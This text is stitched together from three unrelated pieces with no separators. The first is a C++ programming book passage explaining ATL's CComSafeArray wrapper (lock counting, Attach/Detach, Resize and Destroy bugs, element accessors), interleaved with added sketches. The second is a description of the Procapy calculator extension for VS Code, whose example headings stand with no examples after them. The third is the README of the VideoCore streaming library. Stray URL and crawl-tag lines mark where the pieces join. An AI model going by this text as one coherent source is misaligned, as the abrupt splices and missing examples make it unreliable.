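        total += sa.GetAt(i);                // or sa[i]

    ATLTRACE("count=%u total=%ld\n", sa.GetCount(), total);
}   // the destructor delegates to Destroy, so no explicit cleanup is needed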
CopyFrom accepts a SAFEARRAY* and CComSafeArray provides a SAFEARRAY* cast operator, so the third constructor delegates to the CopyFrom method as well. This produces a clone of the source array. The following code demonstrates how it instantiates a CComSafeArray from an existing instance: CComSafeArray<int> saSrc(5); // source is 1-D array of 5 ints // allocate storage for 1-D array of 5 ints // and copy contents of source CComSafeArray<int> saDest(saSrc); The destructor for CComSafeArray is quite simple as well. It automatically releases the resources allocated for the SAFEARRAY when the instance goes out of scope. The implementation simply delegates to the Destroy method, which is defined as follows: HRESULT Destroy() { HRESULT hRes = S_OK; if (m_psa != NULL) { hRes = Unlock(); if (SUCCEEDED(hRes)) { hRes = SafeArrayDestroy(m_psa); if (SUCCEEDED(hRes)) m_psa = NULL; } } return hRes; } The Destroy method first calls Unlock to decrement the lock count on the internal SAFEARRAY and then simply delegates to the SafeArrayDestroy method. The significance of lock counting SAFEARRAYs is discussed shortly. CComSafeArray defines two assignment operators. Both duplicate the contents of the right-side instance, clearing the contents of the left-side instance beforehand. These operators are defined as follows: CComSafeArray<T>& operator=(const CComSafeArray& saSrc) { *this = saSrc.m_psa; return *this; } CComSafeArray<T>& operator=(const SAFEARRAY *psaSrc) { ATLASSERT(psaSrc != NULL); HRESULT hRes = CopyFrom(psaSrc); if (FAILED(hRes)) AtlThrow(hRes); return *this; } The assignment statement in the first line of the first operator delegates immediately to the second operator that accepts a SAFEARRAY* parameter. CopyFrom clears the contents of the destination SAFEARRAY by eventually calling SafeArrayDestroy to free resources allocated when the target SAFEARRAY was created. This code gets invoked with code such as the following: CComSafeArray<long> sa1(10); // do something interesting with sa1 CComSafeArray<long> sa2(5); // free contents of sa1, duplicate contents // of sa2 and put into sa1 sa1 = sa2; As with the CComVariant and CComBSTR classes discussed earlier, the CComSafeArray class wraps a data type that must be carefully managed if resource leaks are to be avoided. The storage allocated for the encapsulated SAFEARRAY must be explicitly created and freed using the SAFEARRAY API functions. In fact, two chunks of memory must be managed: the SAFEARRAY structure itself and the actual data contained in the SAFEARRAY. Just as with CComVariant and CComBSTR, the CComSafeArray class provides Attach and Detach methods to wrap a preallocated SAFEARRAY: HRESULT Attach(const SAFEARRAY *psaSrc) { ATLENSURE_THROW(psaSrc != NULL, E_INVALIDARG); VARTYPE vt; HRESULT hRes = ::ATL::AtlSafeArrayGetActualVartype( const_cast<LPSAFEARRAY>(psaSrc), &vt); ATLENSURE_SUCCEEDED(hRes); ATLENSURE_THROW(vt == GetType(), E_INVALIDARG); hRes = Destroy(); m_psa = const_cast<LPSAFEARRAY>(psaSrc); hRes = Lock(); return hRes; } LPSAFEARRAY Detach() { Unlock(); LPSAFEARRAY pTemp = m_psa; m_psa = NULL; return pTemp; } The Attach operation first checks to see if the type contained in the SAFEARRAY being attached matches the type passed as a template parameter. If the type is correct, the method next releases its reference to the encapsulated SAFEARRAY by calling Destroy. We glossed over the Destroy method when we presented it previously, but you'll note that the first thing Destroy did was call the CComSafeArray's Unlock method. 
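The Attach implementation shown above validates the element type of the incoming SAFEARRAY against the template argument and rejects a mismatch (E_INVALIDARG). The sketch below is not from the original text; it shows one way a caller could verify the VARTYPE up front with the raw SafeArrayGetVartype API instead of relying on the failure path. The helper name WrapIfLongArray is invented for the example:

#include <atlsafe.h>

HRESULT WrapIfLongArray(SAFEARRAY* psa, CComSafeArray<long>& sa)
{
    if (psa == NULL) return E_POINTER;

    VARTYPE vt = VT_EMPTY;
    HRESULT hr = ::SafeArrayGetVartype(psa, &vt);   // query the element type
    if (FAILED(hr)) return hr;
    if (vt != VT_I4) return E_INVALIDARG;           // not an array of long

    // Types agree, so Attach should succeed; the caller must still Detach
    // before the real owner of psa frees the array.
    return sa.Attach(psa);
}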
The lock count in the SAFEARRAY structure is an interesting historical leftover. Back in the days of 16-bit Windows, the OS couldn't rely on having a virtual memory manager. Every chunk of memory was dealt with as a direct physical pointer. To fit into that wonderful world of 640KB, memory management required an extra level of indirection. The GlobalAlloc API function that's still with us is an example. When you allocate memory via GlobalAlloc, you don't get an actual pointer back. Instead, you get an HGLOBAL. To get the actual pointer, you call GlobalLock and pass it the HGLOBAL. When you're done working with the pointer, you call GlobalUnlock. This doesn't actually free the memory; if you call GlobalLock again on the same HGLOBAL, your data will still be there, but on 16-bit Windows the pointer you got back could be different. While the block is unlocked, the OS is free to change the physical address where the block lives by copying the contents. Today, of course, the virtual memory managers inside modern CPUs handle all this. Still, some vestiges of those old days remain. The SAFEARRAY is one of those vestiges. You are not allowed to do this to access a SAFEARRAY's data:

SAFEARRAY *psa = ::SafeArrayCreateVector(VT_I4, 0, 10);
// BAD - this pointer may not be valid!
int *pData = reinterpret_cast<int *>(psa->pvData);
// BOOM (maybe)
pData[0] = 5;

Instead, you need to first lock the SAFEARRAY:

SAFEARRAY *psa = ::SafeArrayCreateVector(VT_I4, 0, 10);
// GOOD - this will allocate the actual storage for the data
::SafeArrayLock(psa);
// Now the pointer is valid
int *pData = (int *)(psa->pvData);
pData[0] = 5;
// Unlock after we're done
::SafeArrayUnlock(psa);

Locking the SAFEARRAY actually allocates the storage for the data if it doesn't already exist and sets the pvData field of the SAFEARRAY structure. Several different APIs perform this function. You can't just do psa->cLocks++; you must call an appropriate API function. In the bad old days, it was important that handles got unlocked as quickly as possible; if they didn't, the OS couldn't move memory around, and eventually everything ground to a halt as memory fragmentation grew. These days, there's no need to worry about unlocking, but the API remains. So, the CComSafeArray takes a simple approach: It locks the data as soon as it gets the SAFEARRAY and doesn't unlock it until the SAFEARRAY is either Destroyed or Detached. You usually use Attach inside a method implementation to wrap a SAFEARRAY that has been passed to you:

STDMETHODIMP SomeClass::AverageArray(/* [in] */ SAFEARRAY* psa,
    /* [out] */ LONG* plAvg)
{
    if (!plAvg) return E_POINTER;

    CComSafeArray<long> sa;  // Note: no type check is done
                             // against psa type
    sa.Attach(psa);          // we're pointing at the same
                             // memory as psa

    ... perform some calculations

    sa.Detach();             // Must detach here or risk a crash
    return S_OK;
}

When you want to return a SAFEARRAY from a method call, turn to the Detach operation, as in the following example:

STDMETHODIMP SomeClass::get_Array(/* [out] */ SAFEARRAY** ppsa)
{
    if (!ppsa) return E_POINTER;

    CComSafeArray<long> sa(10);

    ... populate sa instance

    // no resources released when we leave scope
    // and no copying performed
    *ppsa = sa.Detach();
    return S_OK;
}

Attach and Detach don't do any copying of the SAFEARRAY, and with the lock count in place, you might be tempted to think of the lock count as a kind of reference counting. Unfortunately, ATL 8 has a bug in the implementation of the Destroy method that makes this use of CComSafeArray problematic.
Consider this code sample: STDMETHODIMP SomeClass::DontDoThis(SAFEARRAY* psa) { // We have two references to the safearray CComSafeArray<long> sa1, sa2; sa1.Attach(psa); sa2.Attach(psa); // manipulate the array here // BUG: Don't do this sa2.Destroy(); } The explicit call to sa2.Destroy() will not actually destroy the underlying SAFEARRAY; this makes sense because there are still outstanding references (and locks) on the underlying data structure. It did, however, call Unlock(). Here's the bug: Even though Destroy was called, sa2 thinks that it's holding on to a valid reference to a SAFEARRAY. As a result, the destructor of sa2 calls Destroy() again, resulting in too many calls to Unlock(). The results afterward are potentially not pretty. To avoid this bug, when you're using CComSafeArray, never Attach multiple CComSafeArray objects to the same SAFEARRAY pointer. Several methods are provided for retrieving information about the size and shape of a CComSafeArray instance: LONG GetLowerBound(UINT uDim = 0) const; LONG GetUpperBound(UINT uDim = 0) const; ULONG GetCount(UINT uDim = 0) const; UINT GetDimensions() const; VARTYPE GetType() const; bool IsSizable() const; All these methods are fairly simple and self-explanatory. GetLowerBound and GetUpperBound return the lower and upper bounds of a particular dimension of the SAFEARRAY. The GetCount method takes a specific dimension number and returns the number of elements in that dimension. GetDimensions returns the total number of dimensions in the SAFEARRAY, also known as the array rank. You can query the Automation VARTYPE with the GetType method. IsSizable indicates whether the SAFEARRAY can be resized. Recall that the definition of the SAFEARRAY data type included an fFeatures bit field that stores information about how the array is allocated. typedef struct tagSAFEARRAY { ... USHORT fFeatures; ... } SAFEARRAY; The SAFEARRAY API functions use this information to properly release elements when the SAFEARRAY is destroyed. The FADF_FIXEDSIZE bit indicates whether the SAFEARRAY can be resized. By default, the SAFEARRAY created with an instance of CComSafeArray is resizable, so the IsSizable method returns true. CComSafeArray doesn't expose any methods for directly manipulating the fFeatures flags, so they would change from their default values only if you directly access the encapsulated SAFEARRAY, if the SAFEARRAY passed to the CComSafeArray constructor has different values, or if an Attach is performed on a SAFEARRAY that manipulated the fFeatures field. You can access the internal SAFEARRAY directly with the GetSafeArrayPtr method: LPSAFEARRAY* GetSafeArrayPtr() { return &m_psa; } If a CComSafeArray instance is resizable, clients can use two different Resize methods to grow or shrink a SAFEARRAY: HRESULT Resize(ULONG ulCount, LONG lLBound = 0); HRESULT Resize(const SAFEARRAYBOUND *pBound); The first version takes the new number of elements and lower bound, constructs a SAFEARRAYBOUND structure from the supplied parameters, and delegates the real work to the second version that accepts a SAFEARRAYBOUND* parameter. This second version of Resize first verifies that the SAFEARRAY is resizable and then relies upon the SAFEARRAY API SafeArrayRedim to do the heavy lifting. The first thing to note is that only the least-significant (rightmost) dimension of a SAFEARRAY can be resized. So, you can change the size of a SAFEARRAY with dimensions [3][5][7] to one with dimensions [3][5][4], but you cannot change it to have dimensions [6][5][7]. 
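Before looking at what Resize does to the data, here is a small usage sketch of the inspection methods and a legal resize; it assumes <atlsafe.h> and an ordinary resizable one-dimensional array, and is not taken from the library itself:

    #include <atlsafe.h>

    void InspectAndResizeSketch()
    {
        CComSafeArray<long> sa(10, 1);       // 10 elements, lower bound 1

        UINT    cDims = sa.GetDimensions();  // 1
        ULONG   cElem = sa.GetCount();       // 10
        LONG    lLo   = sa.GetLowerBound();  // 1
        LONG    lHi   = sa.GetUpperBound();  // 10
        VARTYPE vt    = sa.GetType();        // VT_I4
        ATLASSERT(cDims == 1 && cElem == 10 && lLo == 1 && lHi == 10 && vt == VT_I4);

        if (sa.IsSizable())                  // FADF_FIXEDSIZE is not set by default
        {
            HRESULT hr = sa.Resize(15, 1);   // grow the (right-most and only) dimension
            ATLASSERT(SUCCEEDED(hr));        // always check this HRESULT; see the discussion that follows
        }
    }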
If the resizing operation reduces the size of the SAFEARRAY, SafeArrayRedim deallocates the elements beyond the new bounds. If the operation increases the size of the SAFEARRAY, SafeArrayRedim allocates and initializes the appropriate number of new elements. Be warned: there's a nasty bug in the implementation of the Resize method: HRESULT Resize(const SAFEARRAYBOUND *pBound) { ATLASSUME(m_psa != NULL); ATLASSERT(pBound != NULL); if (!IsSizable()) { return E_FAIL; } HRESULT hRes = Unlock(); if (SUCCEEDED(hRes)) { hRes = SafeArrayRedim(m_psa, const_cast<LPSAFEARRAYBOUND>(pBound)); if (SUCCEEDED(hRes)) { hRes = Lock(); } } return hRes; } If the underlying call to SafeArrayRedim fails, the call to relock the SAFEARRAY is never made. When that happens, everything falls apart, and the destructor might even fail. If you call Resize, be very careful to check the return HRESULT. If it's a failure, you really can't assume anything about the state of the encapsulated SAFEARRAY. The best bet is to Detach it and clean up manually. Microsoft has agreed that this is a bug but was unable to fix it in time for the Visual Studio 2005 release. Hopefully, it'll be officially fixed soon. CComSafeArray also provides three useful Add functions that you can use to append elements in a SAFEARRAY to the end of an existing CComSafeArray instance. Note that these methods work for only one-dimensional SAFEARRAYs. All three versions will assert if the Add method is invoked on a CComSafeArray instance that contains a multidimensional SAFEARRAY. HRESULT Add(const T& t, BOOL bCopy = TRUE); HRESULT Add(ULONG ulCount, const T *pT, BOOL bCopy = TRUE); HRESULT Add(const SAFEARRAY *psaSrc); The first version of Add tacks on a single element to the end of the SAFEARRAY. If the SAFEARRAY is NULL, Add first invokes the Create method to allocate an empty SAFEARRAY. Resize then increases the size of the SAFEARRAY by one, and the SetAt method is called to insert the value of the t parameter into the last element of the SAFEARRAY. The bCopy parameter is discussed further in a moment when we examine the CComSafeArray accessors: SetAt and GetAt. For now, simply understand that this parameter controls whether the CComSafeArray is appended with an independent duplicate of the new item or whether it actually takes ownership of the item. The second version of Add accepts a count and an array of items to append. It works similarly to the single-element version: First, it creates an empty SAFEARRAY, if necessary; then, it calls Resize to grow the SAFEARRAY by ulCount elements. SetAt is invoked within a loop to initialize the new SAFEARRAY elements with the value of the items supplied in the pT parameter. Finally, the third version of Add accepts a pointer to a SAFEARRAY and appends all elements that it contains to the end of the CComSafeArray instance. This version of Add relies upon Resize and SetAt to do its work in exactly the same manner as do the other two versions. Here's how you might use these methods in your own code: CComSafeArray<int> sa; // sa::m_psa is NULL sa.Add(7); // sa allocated and now contains { 7 } int rgVal[] = { 8, 9 }; sa.Add(2, rgVal); // sa now contains { 7, 8, 9 } sa.Add(sa); // sa now contains { 7, 8, 9, 7, 8, 9 } // see discussion of cast operators to // understand what makes this line work Warning: The various Add overloads call the Resize method under the hood, so they're subject to the same buggy behavior if Resize fails. 
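Given that warning, a defensive pattern is to check Add's HRESULT and, on failure, follow the advice above: Detach the wrapper and release the raw SAFEARRAY yourself. The following is only a sketch of one reasonable recovery strategy, assuming <atlsafe.h>:

    #include <atlsafe.h>

    HRESULT AppendSamples(CComSafeArray<int>& sa)
    {
        int rgVal[] = { 1, 2, 3 };
        HRESULT hr = sa.Add(3, rgVal);       // grows the array via Resize internally
        if (FAILED(hr))
        {
            // After a failed Resize the wrapper's state is suspect, so don't trust
            // its destructor: detach and destroy the raw SAFEARRAY manually.
            LPSAFEARRAY psa = sa.Detach();
            if (psa != NULL)
                ::SafeArrayDestroy(psa);
        }
        return hr;
    }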
CComSafeArray provides five methods for reading and writing individual elements of the encapsulated SAFEARRAY. Three of these methods are used for accessing one-dimensional SAFEARRAYs. The GetAt method comes in two flavors. const typename _ATL_AutomationType<T>::_typewrapper& GetAt(LONG lIndex) const { ATLASSUME(m_psa != NULL); if(m_psa == NULL) AtlThrow(E_FAIL); LONG lLBound = GetLowerBound(); ATLASSERT(lIndex >= lLBound); ATLASSERT(lIndex <= GetUpperBound()); if ((lIndex < lLBound) || (lIndex > GetUpperBound())) AtlThrow(E_INVALIDARG); return ( (_ATL_AutomationType<T>::_typewrapper*) m_psa->pvData )[lIndex-lLBound]; } _ATL_AutomationType<T>::_typewrapper& GetAt(LONG lIndex) { // code identical to const version } The two GetAt methods differ only in that the first version uses the const qualifier to enforce read-only semantics for the accessed element. The methods retrieve the upper and lower bounds and validate the specified index against these bounds. Note that the lIndex passed in is the index relative to the lLBound defined for the CComSafeArray instance, which might or might not be zero. To retrieve the requested element, the pvData field of the encapsulated SAFEARRAY is cast to the element type; conventional C-style pointer arithmetic does the rest. At this point, it's worth examining the significance of the _typewrapper field of the _ATL_AutomationType template class presented earlier. Recall that a series of DEFINE_AUTOMATION_TYPE_FUNCTION macros associated the supported C++ data types with both their corresponding Automation VARTYPE as well as a wrapper class. Only one DEFINE_AUTOMATION_TYPE_FUNCTION macro actually supplied a real wrapper class for the C++ data type; all the others shown so far simply use the actual C++ type as the wrapper type. The one macro mapped the VARIANT data type to the CComVariant wrapper class and to a VARTYPE value of VT_VARIANT. This internally sets _typewrapper to CComVariant and allows CComSafeArray to both leverage the convenient semantics of CComVariant in its internal implementation and return CComVariant elements of the SAFEARRAY to the client. Using a wrapper class in the typecasting code within GetAt relies upon the fact that CComVariant holds the encapsulated VARIANT as its only state, as discussed in the previous section on the CComVariant class. An instance of CComVariant resides at precisely the same memory address and occupies precisely the same storage as the encapsulated VARIANT. So, CComSafeArray can seamlessly deal in terms of the _typewrapper type internally and expose the wrapper type to the client as a convenience. Note that wrapper classes for element types must hold the encapsulated type as their only state if this scheme is to work correctly. You'll see in a moment that the GetAt method isn't the only method that breaks down if this isn't the case. The list of DEFINE_AUTOMATION_TYPE_FUNCTION macros didn't generate type mapping support for three other important SAFEARRAY element types that CComSafeArray actually supports, even though the current ATL documentation doesn't mention them. Instead of macros, CComSafeArray provides support for elements of type BSTR, IDispatch*, and IUnknown* through template specialization. The template specialization for all three data types looks very similar; we examine the one for BSTR as an example because you're already familiar with the associated wrapper class: CComBSTR. 
The wrapper class for IDispatch* and IUnknown* is CComPtr, presented in detail in the later section "The CComPtr and CComQIPtr Smart Pointer Classes." The specialization for BSTR fills the role of the DEFINE_AUTOMATION_TYPE_FUNCTION macro, in that it sets the _typewrapper member of _ATL_AutomationType to the CComBSTR wrapper class and sets the type member to VT_BSTR, as you can see in the following code: template <> struct _ATL_AutomationType<BSTR> { typedef CComBSTR _typewrapper ; enum { type = VT_BSTR}; static void* GetT(const BSTR& t) { return t; } }; Similarly, the specialization for IDispatch* sets type to VT_DISPATCH and _typewrapper to CComPtr; the one for IUnknown* sets type to VT_UNKNOWN and _typewrapper to CComPtr. You should recall that, like CComVariant, CComBSTR holds in its m_str member the encapsulated BSTR as its only state. Thus, the code shown previously in the GetAt method works fine for CComSafeArrays that contain BSTR elements. Also note that the specialization shown earlier defines the GetT method differently than the other supported data types. This method is only used by the element accessor functions for multidimensional SAFEARRAYs, in which a void* pointer to the destination buffer must be provided to the SafeArrayGetElement API. The GetT implementation that the DEFINE_AUTOMATION_TYPE_FUNCTION macro generates for all the other data types returns the address of the encapsulated data. In the case of a BSTR, the data type is already a pointer to the data, so GetT is specialized to return the encapsulated type itself instead of a pointer to the encapsulated type. The specializations for IDispatch* and IUnknown* implement GetT in precisely the same way as well because they are also inherently pointer types. CComSafeArray provides the SetAt method for writing to specific elements. The method is defined as follows: HRESULT SetAt(LONG lIndex, const T& t, BOOL bCopy = TRUE) { bCopy; ATLASSERT(m_psa != NULL); LONG lLBound = GetLowerBound(); ATLASSERT(lIndex >= lLBound); ATLASSERT(lIndex <= GetUpperBound()); ((T*)m_psa->pvData)[lIndex-lLBound] = t; return S_OK; } SetAt first ensures that the encapsulated SAFEARRAY is non-NULL and then validates the index passed in against the upper and lower bounds defined for the SAFEARRAY. The assignment statement copies the element data provided into the appropriate location in the encapsulated SAFEARRAY. Assigning a new value to a SAFEARRAY element is accomplished with code like the following: CComSafeArray<long> sa(5); long lNewVal = 14; // replace the 4th element with the value 14 sa.SetAt(3, lNewVal); The relevance of the bCopy parameter becomes evident only when you turn to the four specializations of the SetAt parameter that are provided for SAFEARRAYs: BSTR, VARIANT, IDispatch*, and IUnknown*. Each of these data types requires special handling when performing assignment, so CComSafeArray specializes SetAt to enforce the correct semantics. The specialization for BSTR first uses SysFreeString to clear the existing element in the array and then assigns it either to a copy of the provided BSTR or to the BSTR parameter itself, depending on the value of the bCopy parameter. 
template<> HRESULT CComSafeArray<BSTR>::SetAt(LONG lIndex, const BSTR& strData, BOOL bCopy) { // validation code omitted for clarity BSTR strOrg = ((BSTR*)m_psa->pvData)[lIndex-lLBound]; if (strOrg) ::SysFreeString(strOrg); if (bCopy) { BSTR strTemp = ::SysAllocString(strData); if (NULL == strTemp) return E_OUTOFMEMORY; ((BSTR*)m_psa->pvData)[lIndex-lLBound] = strTemp; } else ((BSTR*)m_psa->pvData)[lIndex-lLBound] = strData; return S_OK; } When bCopy is TRUE, the caller maintains ownership of the strData BSTR parameter, because CComSafeArray will be working with its own private copy. When bCopy is FALSE, CComSafeArray takes ownership of the strData BSTR; the caller must not attempt to free it, or errors will occur when this element is accessed from the SAFEARRAY. The following code snippet demonstrates this important difference: BSTR bstr1 = ::SysAllocString(OLESTR("Go Longhorns!")); BSTR bstr2 = ::SysAllocString(OLESTR("ATL Rocks!")); CComSafeArray<BSTR> sa(5); sa.SetAt(2, bstr1, true); // sa generates its own copy of bstr1 sa.SetAt(3, bstr2, false); // sa assigns element to bstr2 ::SysFreeString(bstr1); // ok, sa still has a copy ::SysFreeString(bstr2); // wrong!!! we don't own bstr2 VARIANT elements in SAFEARRAYs require special handling as well. The code for the specialized version of SetAt for VARIANTs is very similar to that shown earlier for BSTR. The main differences are that the original element is cleared using VariantClear and the copy is performed using VariantCopyInd if bCopy is TRUE. The code that implements SetAt for IDispatch* and IUnknown* type elements is identical (okay, the variable names are different: pDisp for IDispatch* and pUnk for IUnknown*). In either case, the original interface pointer element is Release'd before assignment and then is AddRef'd if bCopy is TRUE. Again, this means that the caller is transferring ownership of the interface pointer to the CComSafeArray if bCopy is FALSE and should not then call Release on the pointer passed to the SetAt method. CComSafeArray ultimately generates a call to Release on each element in the SAFEARRAY when the instance is destroyed, so improper handling leads to a double release of the interface pointer and the all-too-familiar exception as a reward. Both proper and improper interface pointer element assignment are demonstrated in the following code: IUnknown *pUnk1, *pUnk2; // assign both pointers to refer to an object CComSafeArray<IUnknown*> sa(5); sa.SetAt(2, pUnk1, true); // sa calls AddRef on pUnk1 sa.SetAt(3, pUnk2, false); // sa assigns element to pUnk2 // without AddRefing pUnk1->Release(); // ok, refcount non-zero because // of sa AddRef pUnk2->Release(); // wrong!!! we don't own pUnk2 The remaining two methods for accessing SAFEARRAY elements apply to multidimensional SAFEARRAYs. MultiDimGetAt and MultiDimSetAt provide read-and-write access to SAFEARRAY elements housed in a multidimensional SAFEARRAY. Both methods are very thin wrappers on top of the SafeArrayGetElement and SafeArrayPutElement API functions, respectively. HRESULT MultiDimGetAt(const LONG *alIndex, T& t) { ATLASSERT(m_psa != NULL); return SafeArrayGetElement(m_psa, const_cast<LONG*>(alIndex), &t); } HRESULT MultiDimSetAt(const LONG *alIndex, const T& t) { ATLASSERT(m_psa != NULL); return SafeArrayPutElement(m_psa, const_cast<LONG*>(alIndex), _ATL_AutomationType<T>::GetT(t)); } The alIndex parameter specifies an array of SAFEARRAY indices. 
The first element in the alIndex array is the index of the rightmost dimension; the last element is the index of the leftmost dimension. You make use of these functions like this: // 2-D array with all dimensions // left-most dimension has 3 elements CComSafeArrayBound bound1(3); // right-most dimension has 4 elements CComSafeArrayBound bound2(4); // equivalent C-style array indices would be [3][4] CComSafeArrayBound rgBounds[] = { bound1, bound2 }; CComSafeArray<int> sa(rgBounds, 2); int rgIndElement1[] = { 0, 1 }; // access element at sa[1][0] int rgIndElement2[] = { 3, 2 }; // access element at sa[2][3] long lVal = 0; // retrieve value at sa[1][0] sa.MultiDimGetAt(rgIndElement1, lVal); // multiply value by 2 and store it // in element located at sa[2][3] sa.MultiDimSetAt(rgIndElement2, lVal*=2); CComSafeArray defines four operators that provide some syntactic convenience for accessing elements of a SAFEARRAY: const typename _ATL_AutomationType<T>::_typewrapper& operator[](int nIndex) const { return GetAt(nIndex); } typename _ATL_AutomationType<T>::_typewrapper& operator[](int nIndex) { return GetAt(nIndex); } const typename _ATL_AutomationType<T>::_typewrapper& operator[](LONG nIndex) const { return GetAt(nIndex); } typename _ATL_AutomationType<T>::_typewrapper& operator[](LONG nIndex) { return GetAt(nIndex); } As you can see, all these operators simply delegate to the GetAt accessor method, discussed in the previous section. They differ only in the type of index and whether the const qualifier is specified. These operators enable you to write code with CComSafeArray that looks very much like the code you use to manipulate C-style array elements. CComSafeArray<int> sa(5); ATLASSERT(sa[2] == 0); sa[2] = 17; ATLASSERT(sa[2] == 17); CComSafeArray also provides two cast operators. Both implementations are trivial, serving only to expose the encapsulated SAFEARRAY. Nevertheless, they provide some syntactic convenience in some situations, such as when you want to pass a CComSafeArray instance to a function that expects a SAFEARRAY*. operator const SAFEARRAY *() const { return m_psa; } operator LPSAFEARRAY() { return m_psa; } Unfortunately, CComSafeArray does not supply one operator: an overload of operator&. Without it, you can't use CComSafeArray as a wrapper for an out parameter like this: HRESULT CreateANewSafeArray( SAFEARRAY** ppsa ) { *ppsa = SafeArrayCreateVector(VT_I4, 1, 15 ); return S_OK; } HRESULT UseCreatedSafeArray( ) { CComSafeArray< int > sa; HRESULT hr = CreateANewSafeArray( &sa ); } The previous code will not compile but will fail with this error: error C2664: CreateANewSafeArray : cannot convert parameter 1 from ATL::CComSafeArray<T> *__w64 to SAFEARRAY ** with [ T=int ] Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast This use differs from most of the other ATL smart types, which let you do exactly this, but there's a good reason for the disparity. Imagine that the ATL team had included the overloaded operator&. What happens in this case? HRESULT CreateANewSafeArray( SAFEARRAY** ppsa ) { *ppsa = SafeArrayCreateVector(VT_BSTR, 1, 15 ); return S_OK; } HRESULT UseCreatedSafeArray( ) { CComSafeArray< int > sa; HRESULT hr = CreateANewSafeArray( &sa ); } The C++ compiler can't tell what the returned SAFEARRAY actually contains; that information is available only at runtime. The compiler would have to allow the conversion, and we now have a CComSafeArray<int> wrapping a SAFEARRAY that actually contains BSTRs. 
Nothing good can come of this, so the operator& overload was left out. Instead, you can do this: HRESULT UseCreatedSafeArray( ) { SAFEARRAY *psa = NULL; HRESULT hr = CreateANewSafeArray( &psa ); CComSafeArray< int > sa; sa.Attach( psa ); } The error will now be detected at runtime inside the CComSafeArray::Attach method. The GetSafeArrayPtr() method, mentioned earlier, explicitly retrieves a pointer to the stored SAFEARRAY. It can be used like this: HRESULT UseCreatedSafeArray( ) { CComSafeArray< int > sa; HRESULT hr = CreateANewSafeArray(sa.GetSafeArrayPtr()); } However, this use bypasses the runtime type check in the Attach method and is not recommended for this reason.
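Putting the pieces together, a reasonable pattern for the out-parameter case is to receive the raw SAFEARRAY* first and only then Attach, handling a possible type mismatch. This is only a sketch: it assumes ATL exceptions are enabled (so AtlThrow raises a CAtlException) and reuses the hypothetical CreateANewSafeArray function from the examples above.

    #include <atlsafe.h>

    HRESULT UseCreatedSafeArraySafely()
    {
        SAFEARRAY *psa = NULL;
        HRESULT hr = CreateANewSafeArray(&psa);   // plain SAFEARRAY** out parameter, as above
        if (FAILED(hr))
            return hr;

        CComSafeArray<int> sa;
        try
        {
            sa.Attach(psa);                       // the runtime VARTYPE check happens here
        }
        catch (const CAtlException& e)
        {
            ::SafeArrayDestroy(psa);              // on failure we still own the raw array
            return e;                             // CAtlException converts to its HRESULT
        }
        // ... use sa; its destructor releases the SAFEARRAY ...
        return S_OK;
    }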
https://flylib.com/books/en/3.286.1.34/1/
CC-MAIN-2019-43
en
refinedweb
Programmer's Calculator in Python for Visual Studio Code. This is an inline calculator to use inside any document view in Visual Studio Code. Use it inside existing views (e.g. source files) for quick inline calculations, or dedicate a blank/unsaved view to use as an embedded standalone calculator. Simply select an expression (or multiple expressions using multiple selections) and execute the calculator by pressing the keyboard shortcut, and the selection(s) will be replaced by the result of the calculation. Alternatively, if there are no selections, the line under the cursor will be parsed and the result inserted on the line after it (this also works with multiple cursors). This is useful when using it as a normal calculator to incrementally perform a sequence of calculations, using the result of the previous calculation as input for the following one and leaving each step in the series visible. Procapy supports any valid Python, and will reduce the result of any expression to a number (or an error string if something did not parse correctly). The default keyboard shortcuts are: In addition to the Python standard functions, math and cmath modules (the latter imported into the cmath namespace), Procapy adds the following functions that are useful in programming: These are similar to the built-in function int(x), which will truncate to an integer of unlimited width. In addition, the variable n is assigned a value matching the index of each selection. This can be used in mathematical expressions to form different results for each selection. Difference between two hex numbers: Same but truncated to 32bit unsigned range, which reveals the two's complement encoding of the negative number: Division and addition: Same but adding truncation to 8bit unsigned of intermediate results: Interpretation of a positive hex number as unsigned integer: Same but truncated to 32bit signed integer, revealing the value when interpreted as a two's complement encoding: Comparison operators return True/False in decimal mode and 0/1 in hex/binary/octal: Same but with truncation of intermediate result to 32bit unsigned integer: Mixed radix calculations: Bitwise operators (OR, NOT, AND, XOR): Shift operators: Boolean operators and (in)equality: Rounding: Icon designed by Freepik from Flaticon. Initial release of Procapy.
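To make the truncation behaviour described above concrete, here is the same arithmetic written out in C++ (an illustration only; Procapy itself evaluates Python expressions, and the names of its truncation helpers are not reproduced here):

    #include <cstdint>
    #include <cstdio>

    int main()
    {
        // Difference of two hex numbers, then the same result truncated to the 32-bit
        // unsigned range, which exposes the two's complement encoding of the negative value.
        long long diff = 0x3A - 0x7F;                             // -69
        uint32_t  u32  = static_cast<uint32_t>(diff);             // 0xFFFFFFBB

        // Division and addition with the intermediate result truncated to 8-bit unsigned.
        uint8_t   sum8 = static_cast<uint8_t>((200 / 3) + 250);   // (66 + 250) & 0xFF = 60

        std::printf("%lld 0x%08X %u\n",
                    diff, static_cast<unsigned>(u32), static_cast<unsigned>(sum8));
        return 0;
    }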
https://marketplace.visualstudio.com/items?itemName=thomasthorsendk.procapy
CC-MAIN-2019-43
en
refinedweb
VideoCore is a project inteded to be an audio and video manipulation and streaming graph. It currently works with iOS and periodic (live) sources. It is a work in progress and will eventually expand to other platforms such as OS X and Android. Contributors welcome! Table of Contents Setup CocoaPods Create a Podfile with the contents platform :ios, '6.0' pod 'VideoCore', '~> 0.2.0' Next, run pod install and open the xcworkspace file that is created. Sample Application The SampleBroadcaster project in the sample folder uses CocoaPods to bring in VideoCore as a dependency: cd sample/SampleBroadcaster pod install open SampleBroadcaster.xcworkspace … or you can build from the command-line: xcodebuild -workspace SampleBroadcaster.xcworkspace -scheme SampleBroadcaster build More on CocoaPods: Architecture Overview VideoCore’s architecture is inspired by Microsoft Media Foundation (except with saner naming). Samples start at the source, are passed through a series of transforms, and end up at the output. e.g. Source (Camera) -> Transform (Composite) -> Transform (H.264 Encode) -> Transform (RTMP Packetize) -> Output (RTMP) videocore/ sources/ videocore::ISource videocore::IAudioSource : videocore::ISource videocore::IVideoSource : videocore::ISource videocore::Watermark : videocore:IVideoSource iOS/ videocore::iOS::CameraSource : videocore::IVideoSource Apple/ videocore::Apple::MicrophoneSource : videocore::IAudioSource OSX/ videocore::OSX::DisplaySource : videocore::IVideoSource videocore::OSX::SystemAudioSource : videocore::IAudioSource outputs/ videocore::IOutput videocore::ITransform : videocore::IOutput iOS/ videocore::iOS::H264Transform : videocore::ITransform videocore::iOS::AACTransform : videocore::ITransform OSX/ videocore::OSX::H264Transform : videocore::ITransform videocore::OSX::AACTransform : videocore::ITransform RTMP/ videocore::rtmp::H264Packetizer : videocore::ITransform 